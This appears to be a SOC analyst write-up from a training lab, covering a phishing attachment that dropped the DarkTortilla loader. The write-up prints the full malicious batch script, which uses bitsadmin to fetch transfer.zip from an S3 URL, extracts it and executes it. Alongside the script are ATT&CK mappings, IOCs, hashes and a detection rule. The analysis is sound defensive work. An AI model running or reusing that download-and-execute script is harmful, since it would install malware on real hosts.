EventID: 277 · Host: Garnet (172.16.17.71) · User: letsdefend · Time: 2024-07-12 06:09:15 (UTC+3) · Verdict: True Positive
User on Garnet received a phishing email from [email protected] carrying project2024.zip. Opening it ran project2024.cmd, which used bitsadmin to pull transfer.zip from an S3 bucket, extracted it with 7-Zip and executed transfer.exe. The payload is DarkTortilla, a .NET crypter/loader. Endpoint isolated, scope limited to the single host.
project2024.zipproject2024.cmdbitsadmin /transfer myDownloadJob downloads transfer.zip to C:\Users\letsdefend\Downloads\7z.exe extracts to C:\Users\letsdefend\Downloads\transfer\transfer.exe launched and confirmed runningbatch
@echo off
bitsadmin /transfer myDownloadJob https://files-ld.s3.us-east-2.amazonaws.com/transfer.zip C:\Users\letsdefend\Downloads\transfer.zip
"C:\Program Files\7-Zip\7z.exe" x "C:\Users\letsdefend\Downloads\transfer.zip" -o"C:\Users\letsdefend\Downloads\transfer\"
cd C:\Users\letsdefend\Downloads\transfer
transfer.exe
The L1 couldn’t call it. The chain answers it: BITS was invoked by a batch file from an emailed archive, dropped into a user Downloads folder, and the payload ran immediately. Nothing about that matches admin tooling.
| Technique | Tactic | Name | Evidence |
|---|---|---|---|
| T1566.001 | Initial Access | Spearphishing Attachment | project2024.zip from maidtimepro.com |
| T1204.002 | Execution | User Execution: Malicious File | User ran project2024.cmd (analyst addition) |
| T1059.003 | Execution | Windows Command Shell | Batch script drives the chain |
| T1197 | Defense Evasion | BITS Jobs | myDownloadJob via bitsadmin |
| T1105 | Command and Control | Ingress Tool Transfer | transfer.zip pulled from S3 |
| Type | Value |
|---|---|
| Sender | support[@]maidtimepro[.]com |
| URL | hxxps://files-ld[.]s3[.]us-east-2[.]amazonaws[.]com/transfer[.]zip |
| SHA256 (project2024.zip) | f610fb4665740cf5d78db885529dd0e84fbd43ae1088642f2ebfe307f21d1b6c |
| SHA256 (transfer.exe) | aea48d054d3c5d517a680e92dea37a34b84543c343ec9227b6b637a1dcc74e91 |
| Host | Garnet / 172[.]16[.]17[.]71 |
🔬 Analysis Reports 🦠 VirusTotal https://www.virustotal.com/gui/url/58e07c394b7178e859796ca153e9c120c7647a6e117675d71f11e1a7fbbe5482/detection https://www.virustotal.com/gui/domain/maidtimepro.com https://www.virustotal.com/gui/file/aea48d054d3c5d517a680e92dea37a34b84543c343ec9227b6b637a1dcc74e91
bitsadmin /transfer with cmd.exe parent writing to user-writable paths